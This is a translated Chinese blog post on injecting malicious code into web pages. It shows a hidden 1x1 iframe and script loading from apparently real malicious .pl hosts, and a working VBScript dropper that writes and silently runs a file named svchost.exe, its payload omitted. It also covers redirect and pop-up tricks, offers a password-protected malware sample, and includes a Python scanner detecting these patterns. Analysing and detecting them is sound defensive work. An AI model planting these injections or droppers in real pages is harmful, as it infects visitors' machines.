Virus_Html_SampleAnalysis

Source: Internet   Editor: 程序博客网   Time: 2024/06/05 05:28

This post covers common techniques for planting malicious code (挂马) in HTML pages.

0x1 Simple HTML injection: the frame approach

To check whether a site has been injected, the usual approach is to search the page source for the keyword iframe.

<iframe src=https://www.baidu.com/ width=1300 height=250 ></iframe>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>

--- The following is from the web; I have not yet understood the foreign load.exe.

document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.chura.pl/rc/pdf.php?id=546983' type='application/pdf'></embed>";
break;}}
var url="http://jl.chura.pl/rc/load.php?id=546983"

http://jl.chura.pl/rc/load.php?id=546983&spl=3
http://jl.chura.pl/rc/load.php?id=546983&spl=2

0x2 VBScript that writes a local file

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "..."   ' hex-encoded bytes of the file to drop; the payload string is omitted on this page
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName   ' GetSpecialFolder(2) is the user's Temp directory
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2   ' every two hex characters become one byte of the file
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0   ' window style 0: run hidden
//--></SCRIPT>

0x3 Finally it jumps here

Damn, if the line below is not wrapped in a code box it redirects straight away…

<body onload="window.location ='http://cn.bing.com/?scope=web';"></body>

0x4 Methods still to be tested

1. <meta http-equiv="refresh" content="0; url=data:text/html; base64,....">
2. <script language="javascript" src="http://cn.bing.com/?scope=web/js"></script>
3. window.open("","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
4. <p><a id="qipian" href="http://bbs.pediy.com/"></a></p>
5. <a href="https://www.baidu.com/" target="_blank">
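The keyword search suggested in 0x1 scales poorly once the patterns from 0x2, 0x3 and 0x4 are added, so here is an added triage scanner that is not part of the original post. The names scan_html, TagScanner and BODY_RULES are assumptions, and SAMPLE_PAGE is a constructed page using reserved .example hosts rather than any real site. It walks the tags with the standard-library HTMLParser and the script bodies with regular expressions, flagging 1x1 or display:none iframes, body onload redirects, a meta refresh to a data: URI, external script sources outside an allowlist, VBScript FileSystemObject/WScript.Shell usage and 1x1 window.open pop-ups, while leaving a normal-sized iframe alone.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not taken from the original post): one instance of
# each injection pattern discussed above, using reserved .example hostnames.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; url=data:text/html;base64,PGh0bWw+">
<script language="javascript" src="http://attacker.example/js"></script>
</head>
<body onload="window.location ='http://redirect.example/';">
<p>normal page content</p>
<iframe src="http://dropper.example/rc/" width=1 height=1 style="border:0"></iframe>
<iframe src="https://video.example/embed" width=640 height=360></iframe>
<script language="VBScript">
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSHshell = CreateObject("WScript.Shell")
</script>
<script>window.open("","","toolbar=no,location=no,width=1,height=1");</script>
<a id="qipian" href="http://hidden.example/"></a>
</body></html>"""

# Patterns checked inside <script> bodies: (rule name, regex).
SCRIPT_BODY = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
BODY_RULES = [
    # VBScript dropper markers from 0x2: file-system and shell objects.
    ("vbscript_dropper", re.compile(r"Scripting\.FileSystemObject|WScript\.Shell", re.I)),
    # 1x1 pop-up window from 0x4 item 3.
    ("popup_1x1", re.compile(r"window\.open\s*\([^)]*width=1\b[^)]*height=1\b", re.I)),
    # Inline redirect; the object prefix is required so "location=no" inside
    # a window.open feature string is not mistaken for an assignment.
    ("inline_redirect", re.compile(r"(?:window|document|top|self)\.location(?:\.href)?\s*=", re.I)),
]


def _dim(attrs, name):
    """Integer width/height attribute, or None when absent or not a plain number."""
    value = attrs.get(name, "").strip().lower().rstrip("px")
    return int(value) if value.isdigit() else None


def _is_tiny(attrs):
    width, height = _dim(attrs, "width"), _dim(attrs, "height")
    return width is not None and height is not None and width <= 1 and height <= 1


def _is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class TagScanner(HTMLParser):
    """Flags tags matching the patterns from 0x1 (iframe), 0x3 (onload) and 0x4 (meta, script src)."""

    def __init__(self, allowed_script_hosts=()):
        super().__init__()
        self.allowed_script_hosts = set(allowed_script_hosts)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe" and (_is_tiny(a) or _is_hidden(a)):
            self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "body" and "location" in a.get("onload", "").lower():
            self.findings.append(("onload_redirect", a["onload"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh" \
                and re.search(r"url\s*=\s*data:", a.get("content", ""), re.I):
            self.findings.append(("meta_refresh_data_uri", a["content"]))
        elif tag == "script" and re.match(r"https?://", a.get("src", ""), re.I):
            host = urlparse(a["src"]).hostname or ""
            if host not in self.allowed_script_hosts:
                self.findings.append(("external_script", a["src"]))


def scan_html(html, allowed_script_hosts=()):
    """Return a list of (rule, detail) findings for one HTML document."""
    parser = TagScanner(allowed_script_hosts)
    parser.feed(html)
    parser.close()
    findings = list(parser.findings)
    for match in SCRIPT_BODY.finditer(html):
        body = match.group(1)
        for rule, pattern in BODY_RULES:
            if pattern.search(body):
                findings.append((rule, body.strip()[:60]))
    return findings


if __name__ == "__main__":
    for rule, detail in scan_html(SAMPLE_PAGE):
        print(f"{rule:22} {detail}")
```

Pass the site's own CDN hosts in allowed_script_hosts to keep the external_script rule from flagging legitimate includes; the remaining rules are specific enough to review one by one on a page that a keyword search for iframe alone would miss.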

0x5 Samples

Sample: please download it only if you confirm it will be used for testing; I take no responsibility for anything else. Password: the usual international convention.

0x6 References

网页挂马方法和技巧大汇总 (a comprehensive roundup of web-page 挂马 methods and techniques)
